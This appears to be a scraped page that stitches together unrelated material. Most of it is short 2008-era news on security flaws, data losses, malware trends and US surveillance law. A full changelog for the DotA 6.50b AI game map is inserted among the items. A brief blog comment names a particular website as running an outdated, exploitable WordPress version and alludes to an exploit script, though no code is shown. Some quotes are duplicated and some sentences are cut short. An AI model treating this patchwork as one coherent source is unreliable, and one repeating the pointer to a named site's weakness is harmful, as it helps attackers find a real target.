daily online news

Cisco rushed out a brace of security on Thursday to defend against potentially dangerous exploits via its VoIP kit, including the possibility of malicious code being injected into vulnerable networks.

The twin advisories from the network giant cover a range of vulnerabilities in Cisco IP Phones and its Unified Communications Manager (UCM) call management software.

A range of Cisco 7900 Series IP Phones are subject to multiple flaws, some of which may lend themselves to attacks involving the execution of arbitrary code on a vulnerable phone. Malicious DNS responses, a bug on the phone's SSH server and flaws in the handling of MIME on SIP messages all create buffer overflow risks. Other bugs create a means to crash vulnerable phones.

The bugs affect ranges of Cisco Unified IP Phone devices running both SIP firmware and SCCP firmware, as explained here. Cisco's advisory - which contains patching instructions - can be found here.

Exploitation would be tricky but updates are still recommended to guard against possible attack. Workarounds involving disabling potentially vulnerable servicse are possible but troublesome because they would stop remote management of devices, the SANS Institute Internet Storm Centre notes.

Sys admins also need to update their software to either version 5.1(3a) or 6.1(1a), as appropriate, following the discovery of a SQL injection flaw. Left unguarded the vulnerability creates a means for authenticated user to get their hands on sensitive database information, such as user names and password hashes, and call records. Logged-in users may also be able to alter or delete call records. Cisco's advisory can be found here. ®

Over 90 per cent of computer users believe that cyber-criminals will step up their attacks on Apple Macs in the future, according to a new poll.

However, half of respondents to the Sophos survey said that the problem will be as great as that faced by Windows users.

"Although we have seen the first attempts by criminal gangs to make money through Mac OS X malware, there are still only a tiny number of viruses and Trojans for Apple Macs compared to Windows," said Graham Cluley, senior technology consultant at Sophos.

"It seems unlikely that the Mac virus problem will ever be as big as the Windows one. Yes, the Macintosh malware threat is a concern, but it is important to put it into perspective."

Commentators have pointed out that the threats are less about the inherent security of any given operating system and more down to economies of scale.

As the popularity of Macs increases, and Apple improves its market share, it becomes increasingly viable for professional hackers to target Mac users.

Cluley added that this represents the perfect opportunity for Mac users to learn from the mistakes of PC users.

"By resisting the urge to click on unsolicited web links or to download unknown code from the web, they can help to send a clear message to the cyber-criminals that it is just not financially rewarding to target Macs," he said.

A similar survey two years ago revealed that only 79 per cent of computer users believed that Macs would become more commonly targeted by hackers, indicating that users are now less optimistic about the likelihood of their computers being attacked in the future.

In a blog posted yesterday on Opera’s website, blogger Claudio Santambrogio tells us that he isn’t happy about the way Mozilla handled an Opera security disclosure. Here’s what Claudio had to say:

Mozilla notified us of one security issue ( ) the day before they published their public advisory ( ). They did not wait for us to come back with an ETA for a fix: they kept their bug reports containing the details of the exploits closed to the public for a few days, and now opened most of them to everybody ( awww ).

Opera is as always committed to not only protecting its users, but to making the Web a safe place. We believe in responsible disclosure of vulnerabilities affecting several vendors.

Now I followed that published link and it says nothing about an Opera vulnerability unless it’s something that affects both Opera and Mozilla software. It’s still too early to tell since details about the vulnerability are sparse. Developing …

Many of the people behind identity theft scams are themselves having data stolen from them in the process, a security researcher has revealed.

Phishers, who trick online banking users into typing in their details to fake sites, use tools in the process which have built-in security holes for others to access the data that many do not have the technical skills to spot, according to a security researcher.

Nitesh Dhanjan will next week tell the Black Hat security conference in Washington of the results of his and his colleague Billy Rios's immersion in the world of phishers. He told OUT-LAW Radio of his findings this week.

Dhanjani claims that most phishers are far from the technical sophisticates of the popular imagination. Most, he said, use pre-written phishing kits that take little skill to operate.

"What you see in [the kits] is ready made phishing sites," he said. "All the research we've done is just basically what you can do from a web browser without even crossing the line where it's called hacking."

Dhanjani said it was extremely easy to come across details that had been stolen just hours previously. "Within 15 minutes of starting this research we were staring at people's bank accounts and credit card numbers and ATM PIN numbers posted on international message boards," he said.

But the authors of the phishing kits are using more junior phishers to do the work for them. Dhanjani said when he and Rios, who both work for un-named major corporations, looked at the computer code in the kits, they found that it had two different instructions commanding the system to email a victim's details.

"We realised that in the second mail command there was a hard coded email address that the victim's information was also going to," said Dhanjani. "So unbeknown to the phisher deploying this kit, his information from the victim is going to him in addition to the author who wrote this kit, so there you have a phisher phishing a phisher."

Gartner estimated that phishing scams cost $3.2bn in 2007, and there are significant costs over and above the money lost because it is often very difficult and time consuming for people to prove that they were not responsible for spending in their name.

Dhanjani said that there is no easy fix to the problem. He said that until banks and governments have more sophisticated systems than just simple credit card or government identity numbers the problem will continue.

He said, though, that the cost of changing those systems was greater than the sums currently being lost, meaning the systems are unlikely to change soon.

A laptop containing personal information on 5,123 patients has gone missing from an NHS hospital in Dudley.

The theft occurred on 8 January in the outpatient department at Russells Hall Hospital.

The latest data protection blunder was uncovered only when the Dudley Group of Hospitals wrote to those affected to warn them of the theft.

The hospital claims that the laptop was adequately protected and requires multiple passwords to access the data.

The NHS trust said that the laptop needs a log-in and password to switch on, and that the database containing the patient details requires a separate password.

"Clearly this is a serious issue," said Russells Hall Hospital spokesman Paul Farenden.

"We take precautions to try to protect all the IT equipment in our hospitals from theft, but given that this is a public building with thousands of people accessing it every day, there are inevitably practical difficulties around security."

Farenden said that the trust is in the process of rolling out encryption technology, following a £135,000 spend on data security. However, the laptop in question had not been upgraded before it was stolen.

Chris Mayers, chief security architect at Citrix, said that the HMRC data loss in November 2007, and the prospect of such incidents being made a criminal offence, should have been enough to create an atmosphere of increased security, but that this had clearly not happened.

A major security vulnerability in the Linux kernel, which was revealed on Sunday, has claimed its first confirmed UK victim in business ISP Claranet.

Hackers used a bug in the sys_vmsplice kernel call, which handles virtual memory management, to gain root privileges and replace Claranet customers' index.html files with the hacker's calling card.

The exploit was noticed at about 6pm on Tuesday.

Claranet said: "Malicious activity related to the vulnerability was detected on Claranet's shared hosting platform. Within 10 minutes Claranet contained and halted the malicious activity, and locked down the platform to prevent further damage.

"The shared hosting platform was fully patched with the vendor's updates by 10am on Wednesday. Less than one per cent of the total web sites hosted on the Claranet platform were affected and all were restored to their original states by 1pm on Wednesday 13 February."

The (potentially tricky) hacking process was dumbed down by the publication of exploit code earlier this week, Linux-Watch notes.

Security notification firm Secunia reports that switching to either version 2.6.23.16 or 2.6.24.2 of the Linux kernel guards against attack. Hotfixes designed to plug the vulnerability short of upgrading the kernel have also been released.

The affected system call first appeared in version 2.6.17 of the Linux kernel, but wasn't left open to exploit until changes were made with the 2.6.23 version.

Linux vendors are working on a permanent fix for the problem. Claranet emphasised that it keeps a close eye on announcements of new vulnerabilities and acts swiftly to patch them

Security systems can now block the first computer viruses attack on cell phones, but the mobile industry sees new risks stemming from upcoming open software platforms such as Google's Android.

Since 2004, viruses have been able to disable phones or swell phone bills through pricey messages or unwanted calls, leading to a new security technology market.

"If Android becomes a fully open platform ... and when such a platform becomes more common, risks are greater than with the current platform kings such as Symbian," said Mikko Hypponen, head of research at security software firm F-Secure.

Security specialists also pointed to potential risks arising from Apple's plans to open its software platform to third-party developers this month.

"Apple has dealt very elegantly in the past with security issues. There will be issues. Apple will fix them," said Jan Volzke, global marketing head at McAfee's mobile unit.

Roughly 65 percent of all smartphones sold in the fourth quarter used software from British supplier Symbian, according to research firm Canalys.

Apple was the fourth-largest vendor with 7 percent of the market, following Microsoft and Research In Motion.

F-Secure and McAfee have been the leading security software vendors for mobiles, but many other antivirus firms rolled out products for the mobile industry over the last few years.

While the risk of a cell phone getting infected is still relatively small, thousands of phones have seen problems.

"Although the first problems were already quite extensive and appeared all over the world, current smartphones from the largest device makers, particularly Nokia, have got rid of these problems," said F-Secure's Hypponen.

Almost three out of four users were concerned about the safety of using new mobile services, showed a survey of 2,000 cell phone users, commissioned by McAfee, and unveiled this week at the Mobile World Congress in Barcelona.

"Concerns about specific mobile security risks or ... reliability of services is a crucial issue for operators, particularly in mature markets," Victor Kouznetsov, senior vice president at McAfee's mobile unit, said in a statement.

Mobile service providers are increasingly betting on new data services when looking for growth in mature markets where call prices are falling.

"Consumer fears are growing in tandem with increased mobile functionality," Kouznetsov said, adding this puts at risk the potential revenue from new services.

One in seven global mobile users have already been exposed to mobile viruses directly or know someone whose phone has been infected, McAfee's study showed.

Since the first mobile virus appeared in 2004 the number of different viruses, worms, and other types of malicious software has reached 395, F-Secure said, adding that the number of malicious software has increased only slightly in the last 12 months.

Increased use of the internet has produced a number of commonplace threats, according to one security vendor.

Mark Brooks, marketing director at Global Security One, pointed to a recent Panorama programme that highlighted the potential online dangers to children, 12 per cent of whom had met with a stranger they found online.

"The explosion in social networking has meant a rise in online threats, as cyber-criminals create attacks targeting users to gather personal information," he said. "In online banking, fraud is a very real threat for many internet users."

Card-not-present fraud has reached more than £212m per annum, but Brooks believes that this is "just the tip of the iceberg when it comes to overall online financial losses".

Global Security One's latest product is designed to combat common issues posed by the internet.

"With the increase in criminal activity on the web, our aim is to make the internet safer, without limiting or restricting use," said Brooks.

Global Security One's XGate device is designed to remove the need for a separate router and security software by combining both aspects.

HP HAS SETTLED its court case with the newspapers and hacks who it spied on during an investigation into Board Room leaks.

No one is saying how much HP paid the New York Times and three BusinessWeek journalists who were spied on.

It looks like few of them will be buying boats or cars on the back of the settlement as most of the money seems to be going to charity.

The Times hack John Markoff, and BusinessWeek reporters Peter Burrows, Ben Elgin and Roger Crockett sued in September 2006 after the technology company revealed it secretly examined the private telephone logs of journalists, board members and HP employees to identify the source of leaks to the media.

Chairwoman Patricia Dunn and four private dicks faced criminal charges as a result of the case although those charges were later dropped. One investigator, Bryan Wagner, was charged in federal court and pleaded guilty to identity theft and conspiracy.

There are still a few others cases pending against HP. Another group of journalists whose phone records were also compromised in HP's probe are still sueing HP for 'illegal and reprehensible conduct'. Mentioned in that suit are HP, Dunn and Kevin Hunsaker, the company's former ethics chief.

These include three hacks from CNET, Dawn Kawamoto, Stephen Shankland and Tom Krazit and a former reporter from The Associated Press Rachel Konrad.

HP has paid $14.5 million to make California's Attorney General go away as a result of the spying row.

The case of a 19-year-old Swedish hacker could have international ramifications after the Swedish Supreme Court affirmed the conviction in the country's court of appeals. The Swedish prosecutor may take over the FBI's probe of the alleged hacking of Cisco, which has been going on for several years.

In parallel with the prosecution of the hacker from Uppsala, the FBI has been collecting evidence and fingered the hacker as the perpetrator of a hack against Cisco. This crime is said to have taken place at approximately the same time as the crimes he was found guilty of, including hacks against several of Sweden's most prestigious universities and the National Supercomputer Centre in Linköping.

The decision of the Supreme Court of Sweden not to overturn the conviction means that nothing now prevents Sweden from granting the US request of a complete investigation and, later, bringing a court case against the teenager for the Cisco hack. "That possibility is now open," says Chatrine Rudström, chamber prosecutor in Uppsala.

The US request was initiated by local prosecutors and the FBI. There have been high-level contacts between the US and Swedish departments of justice. All letters concerning this matter are classified, but there are strong indications that a request was submitted to Sweden in mid-December 2006.

The conviction does not necessarily imply that the Cisco hack will result in a court case. However, the two cases have much in common, and the Supreme Court's opinion is bound to influence Rudström's decision.

"There is evidence on the man's computer that can be linked to the Cisco hack. Also, he has the same view of both cases," she said.

The US has already been granted some of its demands. After filing a request of legal aid, Swedish investigators have questioned the man about the Cisco intrusions.

The Cisco hack was discovered in 2005, as it emerged that the secret source code for networking equipment had been copied by somebody who gained access to Cisco's servers. After the crackdown in Sweden, the hacks ceased, according to an FBI statement released at the time.

The Uppsala hacker admits to having made the tools used in the hacks, but denies having committed any of them. "He insists that the court of appeals made the wrong decision," says Thomas Olsson, the lawyer of the Uppsala hacker. "Considering the weak argumentation, it might be possible that a different court might find differently."

British students aged 14 to 19 will have their school records permanently placed on an electronic database accessible to prospective employers.

The project, called Managing Information Across Partners (MIAP), will launch in September. The record will include personal details and exam results and will remain with the pupil for life.

More than 40 partners, including the Learning and Skills Council, the Department of Innovation, Universities and Skills, and the Department for Work and Pensions, are involved in the project.

The system will be based on a Unique Learner Number.

"The Unique Learner Number, necessary to acquire a learner record for the diploma is a unique identifier that can be used by a learner for life," MIAP said on its Web site. "It is a national number that is validated and is therefore deemed to be unique."

The aim is to expand the system to include other information and to allow details already available but scattered across many databases to be brought together, it said.

The pupil would have control over the record and would be able to restrict the information shared.

It is envisaged that the information could be transferred if the pupil changes school, goes to college or applies for work, MIAP said.

"This will save a lot of effort for the learner in having to present this information to a prospective employer or a college," it added.

Pupils currently have a Unique Pupil Number which is allocated by a school and used internally for administration purposes. It expires when the pupil leaves.

"At the moment both numbers will work alongside each other but it is quite likely that in the future the ULN would replace the UPN," MIAP said.

Margaret Morrissey, spokeswoman for the National Confederation of Parent Teacher Associations, said: "From the point of view of parents and children hold on--hold on to what is probably a good idea, but which raises concern about data protection."
Now on News.com
Memo to Microsoft: Yahoo's A-list Images: Conjuring creatures in EA's 'Spore' Photos: Want better mileage? Try the junkyard Photos: Want better mileage? Try the junkyard Extra: Don't let your mind get away with anything

The ability of official bodies to keep personal data secure has been questioned by a spate of recent scandals.

In December, nine NHS trusts lost 168,000 patient records. A month before, the details of 25 million child benefit claimants went missing. And information on 3 million learner drivers disappeared during that time.

Government plans for national identity cards have also been criticized for their expense and so-called Big Brother infringement.

The U.S. Senate passed a bill on Tuesday that would amend the Foreign Intelligence Surveillance Act (FISA), the laws governing wiretaps of suspected foreign agents and terrorists, granting retroactive immunity for telecommunications companies that had previously cooperated with the government.

Known as the FISA Amendments Act of 2007, or S.B. 2248, the bill passed by a vote of 68 to 29 with three senators, including Democratic presidential candidates Hillary Rodham Clinton (D-NY) and Barack Obama (D-IL), failing to vote. Senators had delayed the bill for a month in December 2007, and then extended stop-gap legislation by 15 days to give the legislators more time to debate the measure.

The White House commended the Senate on passing a bill that fell in line with its requested surveillance capabilities, and President Bush told the U.S. House of Representatives that he will not condone any more delays on the legislation.

"Congress has had over six months to discuss and deliberate. The time for debate is over," President Bush said in a statement on Wednesday. "If Republicans and Democrats in the Senate can come together on a good piece of legislation, there is no reason why Republicans and Democrats in the House cannot pass the Senate bill immediately."

The debate over the legality of the U.S. government's surveillance activities, which the Bush Administration refers to as the "Terrorist Surveillance Program," started in December 2005 after the New York Times published an article revealing the program. More than three dozens lawsuits have been filed against the telecommunications companies that cooperated with the U.S. government and the National Security Agency (NSA) -- the federal agency responsible for intelligence and surveillance. Ever since a stop-gap measure giving the Bush Administration significant surveillance powers passed in August, Congress has debated the form of future wiretapping for foreign intelligence.

Civil liberty groups blasted the Senate's actions.

"Immunity for telecom giants that secretly assisted in the NSA's warrantless surveillance undermines the rule of law and the privacy of every American," EFF Senior Staff Attorney Kevin Bankston said in a statement. "Congress should let the courts do their job instead of helping the administration and the phone companies avoid accountability for a half decade of illegal domestic spying."

Leaders in the House and Senate now must reconcile the bills in conference.

The FBI and Department of Homeland Security are warning US law enforcement agencies to keep a sharp look-out for "a new type of terrorism" in which apparently-pregnant women suddenly go bang due to the fact they aren't really mums-to-be at all, but cold-hearted suicide bombers packing explosives inside a swelling prosthetic belly.

We kid you not. In case you were wondering how this devilish device works, CBS explains that it "opens up from the front and the explosives are placed inside". There's a chilling news report demonstrating the hi-tech mechanism here.

CBS station in WCBS-TV in New York City duly dragged out security expert Robert Strang for his take on a bang in the oven. He said: "It's not the first time we've had women involved before in one way or another. They're recruiting anybody they can get to do those things that's not going to inform law enforcement, that's not going to be a threat to these organisations that can get the job done."

The they in question is, of course, al-Qaeda, and the powers that be are reportedly a tad concerned that it's "actively recruiting people who look like Americans and sound like Americans to carry out the next attack on America".

While the authorities admit they actually have "no specific, credible intelligence" which indicates terrorists are "planning to use women and suicide bombers to attack", they say they issued the explosive prosthetic pregnant belly alert "in the wake of recent attacks overseas"

Organised criminal hackers are waging a highly sophisticated war by exploiting vulnerabilities in end users' web browsers using drive-by downloads, security experts warn.

The extent of the threat was exposed in a recent Google Online Security Blog post and the 2007 Trend Statistics Report from IBM's X-Force.

"It has been 18 months since we started to identify web pages that infect vulnerable hosts via drive-by downloads, i.e. pages that attempt to exploit visitors by installing and running malware automatically," the Google blog stated yesterday.

"During that time we have investigated billions of URLs and found more than three million unique URLs on over 180,000 sites automatically installing malware."

Google's team also reported that around two per cent of malicious websites are delivering malware via advertising.

IBM reported recently that criminals are directly attacking web browsers in order to steal identities, gain access to online accounts and conduct other illicit activities.

Yuval Ben-Itzhak, chief technology officer at security firm Finjan, said: "Our research teams have already identified more and more criminal hackers using these techniques with a great success."

"After several slow Patch Tuesdays, administrators are faced with the most patches they've seen in a year," said Paul Zimski of Lumension Security. "Because so many critical patches affect so many applications, these are widespread enough to have a bigger effect than we've seen in a year and they are going to require the utmost attention and energy."

released 11 security updates to patch 17 vulnerabilities on Tuesday, by far its largest release in a year.

There were five critical and six important updates, the two highest levels issued by the software company. The patches cover a wide range of Microsoft products from Word, Publisher and the Office suite down to Microsoft Works, its Web server applications and Vista's implementation on the desktop.

The updates come less than a month after vendors such as Skype Latest News about Skype, Adobe Systems (Nasdaq: ADBE) Latest News about Adobe and Apple (Nasdaq: AAPL) Latest News about Apple issued a series of patches. The sheer number of patches released within the past two weeks has placed IT departments in the unenviable position of trying to catch up with potentially malicious crackers.

"After several slow Patch Tuesdays, administrators are faced with the most patches they've seen in a year," Paul Zimski, senior direcor of market strategy with Scotsdale, Ariz.-based Lumension Security, told TechNewsWorld. "Because so many critical patches affect so many applications, these are widespread enough to have a bigger effect than we've seen in a year and they are going to require the utmost attention and energy."

The Web Server Problem

While the Office suite patches are likely the most important for day-to-day operations, the most time-consuming patches involve the Internet Information Services (IIS), which are Internet-based applications for Windows servers, Andrew Storms, director of security for San Francisco-based nCircle, told TechNewsWorld.

Many companies write code for their Web sites, which means any patch that is deployed will need to be tested to make sure that the systems work properly with the home-grown code. If the two systems don't work together, companies could lose their Web sites until the patch can be fixed. Companies could roll back the fix, but that would leave their Web site vulnerable to attacks, said Storms.

"It's going to take some time to test and deploy the IIS patches," said Storms. "That means the hackers have a longer time to seek out exploits in the system."
Patch Tuesdays

At the end of the day, though, Storms said the updates -- while taxing for IT departments -- are a normal part of Microsoft's operation.

The company releases security updates on the second Tuesday of each month. The number of fixes varies, depending upon the testing and research process. Last February, the company released 12 patches. Last month, it released two.

Microsoft has hired a series of private companies -- and its own security experts -- to look for flaws, which it then uses to develop patches. Once the systems have been tested, they are released to the general public.

"Microsoft has hired its own security folks -- along with other private vendors," said Storms. "This is likely the culmination of its release cycle. It's not necessarily out of the norm. Microsoft likely believed that these high-risk patches needed to be released now."

Download Dota v6.50b AI

HERE


6.50b AI Changelog
==============

Hero Changes:
-------------
* Removed manacost on Mana Shield activation
* Changed Leap's cooldown to scale with levels
* Improved Juggernaut's movement speed
* Implemented a better silencing mechanism in the Black Hole area to prevent spell execution regardless of cast animation time
* Lowered Drow Ranger's Agility gain per level
* Changed Drow Ranger's Marksmanship ultimate
* Increased Morphling's base damage
* Macropyre's cooldown no longer increases per level
* Added an extra bounce to Chain Frost
* Reduced Sprint's damage amplification
* Increased Maledict's area of effect by 15
* Changed Spectre's Dispersion
* Redesigned Visage
* Improved casting range on Acid Spray
* Changed how Song of the Siren levels up
* Reduced cooldown on high level Shapeshift
* Improved armor on Enigma's Eidolons
* Reduced Expulsion's cooldown and manacost
* Improved Keeper of the Light's attack animation
* Improved Scattershot's damage range from 10-35 to 20-35
* Improved Alchemist's base Intelligence and growth
* Slightly improved Psi Blades' spill width and range
* Improved Chemical Rage
* Increased Phantom Lancer's Strength gain
* Increased cooldown on Psionic Trap from 7 to 14 seconds
* Improved lifesteal on level 2 and 3 Insatiable Hunger
* Reduced Replicate's manacost and cooldown
* Improved Troll's base movement speed
* Decreased Rampage's movement speed bonus and cooldown
* Improved Spirit Bear's Demolish
* Increased Lightning Storm's cooldown by 2 seconds
* Reduced cooldown on level 4 Metamorphosis from 135 to 110 seconds
* Reduced Lina's movement speed by 5
* Improved Sand Storm
* Reduced the slow on Epicenter
* Improved range on Drow Ranger's Trueshot Aura
* Improved cooldown progression on Insatiable Hunger
* Reduced Sven's base armor
* Improved Enigma's movement speed
* Modified initial projectile speed and effect on Paralyzing Casks
* Improved Enfeeble
* Improved Auto Fire's area of effect and duration
* Reduced Queen of Pain's Blink range at early levels
* Improved Earthshaker's movement speed
* Zombies now give a bit less bounty
* Reduced Gravechill's cooldown a bit
* Increased Primal Roar's cooldown a little bit
* Eclipse's damage is based on Lucent Beam level and doesn't ministun
* Lucent Beam ministun duration increases per level (0.6 level 4 up from a constant 0.01)
* Lowered Eclipse's manacost and gave it constant cooldown progression
* Increased Lucent Beam's casting range and lowered manacost slightly
* Improved cast range on Expulsion and Fire Storm
* Improved Ravage a little (it became slightly less effective with the Impale recodes)
* Reverse Polarity's cooldown is now the same on all levels
* Changes Queen of Pain's blink cooldown from 12/9/7/5 to 12/10/8/6 seconds
* Removed true sight from Spin Web
* Added some extra movement bonus on higher level Spin Web
* Improved Keeper of the Light's movement speed
* Improved Storm Spirit's base armor
* Lowered Mirror Image's cooldown slightly
* Improved slow on Drunken Haze
* Improved movement bonus on Witchcraft
* Lowered Searing Arrows' cooldown
* Improved Reaper's Scythe's leveling a bit
* Changed Purification's damage type to Pure
* Lowered Axe's starting Agility and increased his starting Strength
* Lowered Death Coil's cooldown
* Improved Undying's base armor
* Improved Meepo's base Strength
* Rebalanced Pit of Malice
* Increased AOE on Firestorm
* Reduced the search area for Omnislash
* Changed Bloodrage's stats a bit
* Lowered level 1 Mana Void's manacost
* Lowered Exorcism's damage return threshold and cooldown
* Restored Bone Fletcher's old Wind Walk speed bonus
* Lowered Geminate's attack cooldown
* Slightly improved how Medusa's Purge levels

Item Changes:
-------------
* Redesigned Eul's Scepter of Divinity
* Redesigned Orchid Malevolence
* Redesigned Guinsoo's Scythe of Vyse
* Added cooldown to Bottle usage and reduced its sell cost
* Bottle is in full state at all the side shops once again
* Changed how Dagger of Escape works. It cannot be activated if you took damage in the last 3 seconds.
* Added Hyperstone to the Goblin Shop
* Changed Unholy Rage's lifesteal type to be the same as regular lifesteal
* Reduced price on Ultimate Orb
* Added Ring of Health to the Goblin Shop
* Added Quarterstaff to the Goblin Shops
* Increased Perseverance's damage from 7 to 10
* Added Javelin to the Goblin Shops
* Removed the stack restriction on Shiva's Guard
* Improved Vanguard a little
* Changed Lothar's Edge's recipe and stats
* Reduced Vladmir's Offering recipe cost
* Reduced Linken's Sphere's cooldown
* Removed stacking restriction from Bloodstone and improved its stats
* Improved Helm of the Dominator damage from 10 to 20
* Improved Oblivion Staff mana regen by 25%
* Quarterstaff price reduced
* Hand of Midas can now target level 6 Neutrals (Satyr Hellcaller and Dark Troll Warlord)
* Reduced Void Stone's cost by 25 gold
* Improved casting range per level of Dagon upgrade
* Improved Sange and Yasha
* Removed Flying Courier Mana and gave it a Mana base upgrade ability
* Wards now require 5 mana to be placed
* Reduced animation time and cooldown on Manta Style
* Ring of Health's regeneration increased by 1

Neutral Related:
----------------
* Change some of the Scourge's top left forest area
* Changed the locations and distribution of neutral creep camp groups
* Fixed neutral spawn times in various modes
* Reworked the trees and pathing near the small Sentinel creep camp
* Increased neutral creep Centaur's aura by 5%
* Added an Alpha Wolf with a command aura in the wolves' creep camp
* Added a new creep camp group (1 Ghost with Frost Attack + 2 Fel Beasts)
* Added a new ancient creep camp group (Jungle Stalkers)
* Added a new creep camp group (1 Enraged Wildken with Tornado + 2 Wildkins)
* Added a new creep camp group (1 Dark Troll Warlord with Raise Dead and 1.5 sec Ensnare + 2 Dark Trolls)
* Changed the Furbolg's Stomp to a Clap
* Improved Satyr Hellcaller's Unholy Aura
* Neutral Ogre no longer autocast Frost Armor
* Changed the location of some of the Scourge creep camps
* Redid neutral creep spawner code for some optimizations

Bug Fixes:
-----------
* Recoded impale based effects completely, fixing various ramp bugs, stacking issues and a lot of rare problems. (Burrowstrike, Impale (Lion), Impale (Nerubian Assassin), Ravage)
* Fixed Land Mines to properly detect floating heroes
* Fixed a problem with Huskar's Burning Spears that would cause him to swing incorrectly when the enemy is moving
* Fixed some bugs with Wild Axes
* Fixed some color issues on the load screen (kunkka)
* Couriers can no longer use Scroll of Town Portal to make buildings invulnerable
* Fixed Dark Rift from initiating cooldown when cast incorrectly
* Fixed a bug introduced in the recent Aghanim's Scepter changes on Crystal Maiden
* Fixed Last Word triggering off of Linken's Sphere's usage
* Fixed Berserker Rage triggering Essence Aura
* Insatiable Hunger, God's Strength and Rampage are no longer removed by Cyclone
* Fixed Javelin's odds being slightly off
* Fixed an issue with the Cheese drop from Roshan
* Fixed an issue with Forest Troll High Priest's pathing scale
* Fixed some text display problems when viewing replays (thanks DonTomaso)
* Fixed a very minor bug with Elder Form's duration
* Fixed Armlet of Mordiggian's recipe cooldown
* Fixed typo on Psi Blades
* Fixed some creep death time discrepancies (188461)
* Fixed a very minor bug with the damage mechanism on Shukuchi
* Fixed a display bug with Mode Random
* Fixed a possible abuse with Helm of the Dominator
* Fixed Overload from using its charge when attacking an allied unit
* Fixed Last Word from turning off Electric Rave

Others:
-------
* Remade Invoker as promised in 6.49
* Added a new game mode -singledraft or -sd (swiss)
* Improved Sentinel creep pathing on top Sentinel lane
* Adjusted starting gold between all game modes like ap/xl/rd/sd to be the same (all the same as xl) and for randoms to be like ar. Gold is now give at the start and income starts with the first creep wave.
* Income is now distributed in 1 gold intervals instead of in 8 gold intervals (same total gold)
* Added a new experimental command -ah
* Added a new system to detect replays used in -ah and other future applications (thanks PandaMine)
* Changed how the secondary shops work. You can now see their location and click them while in fog.
* Added new visual effect for Orchid Malevolence's Soul Burn (JetFango)
* -roll now shows the range the person entered (188889)
* Added a new command -clear to clear game messages from your screen
* Reduced model size and changed the look of the non-ancient Golems
* Added a new command -apm to show your actions per minute
* Couriers can now disassemble items (161180)
* Added text descriptions for power ups (68307)
* Delayed the creep spawn time by 30 seconds in -vr
* Made "Helm of Iron Will" item name consistent between recipes and core, using Helm instead of Helmet.
* Centered swap request notice is given to a player (182779)
* Added -afk that displays how long each player has been idle for
* Added a conditionally available -kickafk command to boot players that have been idle for more than 10 minutes (171984)
* Necronomicon icon now changes per level (190183)
* Changed durations of some power ups (Haste 45->30, Illusion 60->75, Regen 45->30)
* Moon Wells now gather water during night and get drained during day. This has no gameplay impact (60920)
* Added new tooltip text on items showing if they can be disassembled
* Improved tooltip for observer wards to detail the stock mechanics
* Added a new command -courier that toggles idle courier icon on and off (Ro-Coco)
* Added a new command -swapall to request to swap for any hero (175040)
* Improved Shackles caster effect
* Added an additional constant (7) Mana regeneration to Fountains
* Removed replenish interval from buying Clarity Potion (like tangos now)
* Changed Heartstopper pure damage type to HP loss (not a nerf or a buff, just works with things like dagger in a more desirable way)
* Improved Electric Rave icon (169997)
* Improved Luna's orb warning message (113338)

A lot of work has been done on developing a system for seamlessly translating DotA to other languages. Thanks to Danat for his help and support on it and to the new translators that have signed up. Once the initial language translation is complete, I will make a post to recruit people that wish to translate into other languages.

Thanks to the following beta testers for their help:
2MT, 4nTr4xX, Aoen, Akuryou, ArcheKleine, AtroCty, Beary, BeastPete, Blaow, Burning-Legions, Calf85, Capnrawr, Cascaderro, chiwhisox, Clogon, Cornerstone, Damican, DarkCloud, DarkMist, DBX_5TM, Dimitrii, Disrup3, EastyMoryan, esby, Eldorquo, EnderX, Evil-Zergling, Exetasi, Exy, Fellower_of_Odin, Firewyrm, frlolg, FzeroXx, gorzerk, Grunthor, Guvoverthere07, HunterX2, IEatDeadPeoples, Infrisios, Jmesch04, Ki-HunterKiller, kugelkind, landonmullet, Loki57, LulaLula, Mago-Merlino, Malakal, McGrady, Minotaar, Moimucus, Nova, PharadoX, phssy_galore, ptdprac, PudgeIsAPirate, Quicksilva, Redial2, Rifleman00, Rigor_Mortis, Ro-Coco, Rubadub, Severas, sketch-e, Sledgehmr, Slopy, spielkind, sSerenity, StokesII, Tarano, Terrorblaze, Thermald, The_Intimidator, TimeToParty, tinfoiltank, Tinker, Tomahawk_Chop, Trozz_, Truxton, Tuwl, u-nL-ike, unHOLYdoNUTS, vigi-, Volcove, whifrA, Wretch, the_white_mage, Y0UR, Zagruss, Zarent, Zethal

http://www.happyslip.com/ site is vulnerable because it is still running WordPress 2.2.1 and it can be exploited by using this script i hope this blog will be updated soon....


good luck kabayan happyslip update your blog asap...

UK government proposals to make ISPs take action against the estimated six million users who access pirated online material every year could prompt an explosion in Wi-Fi hijacking, experts warned today.

Security firm Sophos predicted that the moves outlined in a Green Paper could cause headaches for ISPs and Wi-Fi users, as users could claim that other people have been illegally piggybacking on their internet services.

A Sophos poll of 560 computer users in November revealed that 54 per cent have stolen Wi-Fi internet access in the past.

"Pressure is being put on ISPs to take action, but an open Wi-Fi hotspot may mean that it is you who ends up disconnected from the net while your next door neighbour is happily watching the Hollywood blockbuster they stole via your connection," said Graham Cluley, senior technology consultant at Sophos.

"People who illegally download material from the net are not going to have any qualms about stealing someone else's internet connection.

"The widespread scale of the problem not only means that there are likely to be innocent victims, but it gives those people who have been making illegal downloads a plausible defence."

The Green Paper, which is due to be published next week, outlines a 'three-strikes' initiative under which users making illegal downloads will first receive an email warning, then a suspension of their account, and finally termination of their contract.

"ISPs are finding themselves between a rock and a hard place. They are being leaned on by the movie and music industry to block pirate downloads, but don't want to alienate customers by accusing them of something they didn't do," Cluley added.

"There is no 100 per cent solution for blocking illegal downloads which does not also inconvenience the innocent."

The U.S. Senate Tuesday voted to renew a controversial surveillance law set to expire at the end of the week. Lawmakers left intact a provision to shield telephone companies from lawsuits for their role in the Bush administration's wiretap program, despite opposition from many Democrats. VOA's Deborah Tate reports from Capitol Hill.

The Senate voted to extend a law which authorizes U.S. intelligence agencies to monitor - without warrants - telephone calls and emails between Americans and suspected terrorists overseas.

Passage came after senators voted down an amendment to deny legal immunity to telephone companies that participated in the administration's wiretapping program after the September 11, 2001 terrorist attacks on the United States. Senators also rejected two other amendments that would have weakened the immunity provision.

Some 40 lawsuits have been filed against phone companies for allegedly violating privacy rights.

The immunity provision survived the votes despite opposition from many Democrats, including Senator Russ Feingold of Wisconsin.

"Congress should not be giving automatic retroactive immunity to companies that allegedly cooperated with president's illegal NSA [National Security Agency] wiretapping program," said Senator Feingold. "This provision of the bill is both unnecessary and unjustified, and it will undermine the rule of law."

But President Bush, congressional Republicans and even some moderate Democrats say the immunity provision is necessary. They warn that if the lawsuits are heard in court, national security could be compromised.

